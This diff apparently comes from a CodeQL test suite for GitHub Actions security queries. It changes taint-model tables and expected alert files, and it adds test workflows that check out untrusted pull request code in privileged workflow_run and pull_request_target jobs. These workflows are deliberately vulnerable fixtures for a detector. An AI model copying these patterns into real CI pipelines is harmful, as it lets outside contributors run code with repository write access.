peter-murray/issue-body-parser-action | * | output.* | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | +| tim-actions/get-pr-commits | * | output.commits | text | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | manual | +summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| AsasInnab/regex-action | * | input.search_string | output.first_match | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_first | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_json | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | +| actions-ecosystem/action-regex-match | * | input.text | output.* | taint | manual | +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| dsfx3d/action-extract-unique-matches | * | input.text | output.matches | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kaisugi/action-regex-match | * | input.text | output.* | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| paulschuberth/regex-extract-action | * | input.haystack | output.matches | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| release-kit/regex | * | input.string | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE=$(ls \| grep -E "*.(tar.gz\|zip)$") | +isBashParameterExpansion +| parameter1 | | | +| parameter2 | | | +| parameter3 | ! | | +| parameter4 | # | | +| parameter5 | :- | value | +| parameter6 | : | =value | +| parameter7 | :+ | value | +| parameter8 | : | ?value | +| parameter9 | : | =default value | +| parameter10 | ## | */ | +| parameter11 | /# | pattern/string | +| parameter12 | /% | pattern/string | +| parameter13 | , | pattern | +| parameter14 | ,, | pattern | +| parameter15 | ^ | pattern | +| parameter16 | ^^ | pattern | +| parameter17 | : | start | +| parameter18 | # | pattern | +| parameter19 | ## | pattern | +| parameter20 | % | pattern | +| parameter21 | %% | pattern | +| parameter22 | / | pattern/string | +| parameter23 | // | pattern/string | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 03f9e5b18405..e4c1d9e443d0 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -21,8 +21,6 @@ query predicate extJobs(ExternalJob s) { any() } query predicate steps(Step s) { any() } -query predicate runSteps(Run run, string body) { run.getScript() = body } - query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() } query predicate uses(Uses s) { any() } @@ -59,8 +57,6 @@ query predicate summaries( actionsSummaryModel(action, version, input, output, kind, provenance) } -query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } - query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } query string testNormalizeExpr(string s) { @@ -86,57 +82,6 @@ query predicate writeToGitHubEnv1(string content) { ) } -query predicate writeToGitHubEnv(string key, string value, string content) { - exists(string t | - t = - [ - // block - "{\n echo 'VAR0<> \"$GITHUB_ENV\"\n", - "{\necho 'VAR1<> \"$GITHUB_ENV\"", - "{\necho 'VAR2<> \"$GITHUB_ENV\"", - "FOO\n{\n echo 'VAR22<> \"$GITHUB_ENV\"\nBAR", - // multiline - "FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", - "echo \"PACKAGES_FILE_LIST<> \"${GITHUB_ENV}\"\nls | grep -E \"*.(tar.gz|zip)$\" >> \"${GITHUB_ENV}\"\nls | grep -E \"*.(txt|md)$\" >> \"${GITHUB_ENV}\"\necho \"EOF\" >> \"${GITHUB_ENV}\"", - // heredoc 1 - "cat >> $GITHUB_ENV << EOL\nVAR4=${ISSUE_BODY1}\nEOL", - "cat > $GITHUB_ENV << EOL\nVAR5<> $GITHUB_ENV\nVAR6=${ISSUE_BODY3}\nEOL\n", - "cat < $GITHUB_ENV\nVAR7<> \"$GITHUB_ENV\"\nVAR8=$(echo \"FOO\")\nVAR9<> $GITHUB_ENV", - "echo 'VAR14=$(> $GITHUB_ENV", - "echo VAR15=$(> $GITHUB_ENV", - "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", - ] and - Bash::extractFileWrite(t, "GITHUB_ENV", content) and - Bash::extractVariableAndValue(content, key, value) - ) -} - -query predicate writeToGitHubOutput(string key, string value, string content) { - exists(string t | - t = - [ - "echo \"::set-output name=VAR1::$(> $GITHUB_OUTPUT", - "echo 'VAR5=$(> $GITHUB_OUTPUT", - "echo VAR6=$(> $GITHUB_OUTPUT", - "echo VAR7=$(> \"$GITHUB_OUTPUT\"", - "echo VAR8=$(> ${GITHUB_OUTPUT}", - "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", - ] and - Bash::extractFileWrite(t, "GITHUB_OUTPUT", content) and - Bash::extractVariableAndValue(content, key, value) - ) -} - query predicate isBashParameterExpansion(string parameter, string operator, string params) { exists(string test | test = diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml new file mode 100644 index 000000000000..72db8c29370d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml @@ -0,0 +1,36 @@ +on: + workflow_call: + inputs: + comment: + type: string + required: true + outputs: + SHOULD_RUN: + value: ${{ jobs.resolve.outputs.SHOULD_RUN }} + GIT_REF: + value: ${{ jobs.resolve.outputs.GIT_REF }} +jobs: + resolve: + runs-on: ubuntu-latest + outputs: + SHOULD_RUN: ${{ steps.resolve-step.outputs.SHOULD_RUN }} + GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - if: github.event_name == 'workflow_run' + uses: ./.github/actions/download-artifact + - id: resolve-step + env: + ALLOWED_COMMENT: ${{ inputs.comment }} + run: | + if [[ "${{ github.event_name }}" == "workflow_run" ]]; then + if [[ "$(head -n 1 /tmp/artifacts/metadata.txt)" == *"$ALLOWED_COMMENT"* ]]; then + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=false >> "$GITHUB_OUTPUT" + fi + echo GIT_REF="$(tail -n 1 /tmp/artifacts/metadata.txt)" >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + echo GIT_REF="" >> "$GITHUB_OUTPUT" + fi diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml new file mode 100644 index 000000000000..32f45698a561 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml @@ -0,0 +1,22 @@ +on: + schedule: + - cron: '7 18 * * *' + workflow_run: + workflows: [Trigger] + types: [completed] + workflow_dispatch: +jobs: + resolve: + if: (github.repository == 'test/test' && (github.event_name != 'workflow_run' || github.event.workflow_run.conclusion == 'success')) || github.event_name == 'workflow_dispatch' + uses: ./.github/workflows/resolve-args.yml + with: + comment: "foo" + scale: + permissions: + id-token: write + statuses: write + needs: [resolve] + if: needs.resolve.outputs.SHOULD_RUN == 'true' + uses: ./.github/workflows/test27.yml + with: + git_ref: ${{ needs.resolve.outputs.GIT_REF }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml new file mode 100644 index 000000000000..b1d776ef6c8a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -0,0 +1,22 @@ +on: + workflow_dispatch: + inputs: + git_ref: + description: ref + type: string + workflow_call: + inputs: + git_ref: + type: string +jobs: + run: + permissions: + id-token: write + statuses: write + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ inputs.git_ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml new file mode 100644 index 000000000000..5f67fecc09a5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -0,0 +1,20 @@ +on: + pull_request_target: + types: [opened, ready_for_review, synchronize, reopened, labeled, unlabeled] + branches: + - main + +permissions: + contents: read + +jobs: + setup-environment: + permissions: + contents: write + runs-on: ubuntu-latest + if: ${{ !contains(github.event.pull_request.labels.*.name, 'major-update') && (github.actor == 'renovate[bot]' || contains(github.event.pull_request.labels.*.name, 'renovatebot')) }} + steps: + - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ github.head_ref }} + - run: make foo diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b2e5eb9de81..ec6a664a7abf 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -7,6 +7,7 @@ edges | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | @@ -172,6 +173,9 @@ edges | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/resolve-args.yml:19:9:20:6 | Uses Step | .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | +| .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | @@ -279,6 +283,8 @@ edges | .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | | .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | +| .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -318,10 +324,8 @@ edges | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | @@ -338,10 +342,10 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | .github/workflows/test26.yml | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index a476bdc22d8a..2b9bf3f2b79a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,6 +1,9 @@ | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | 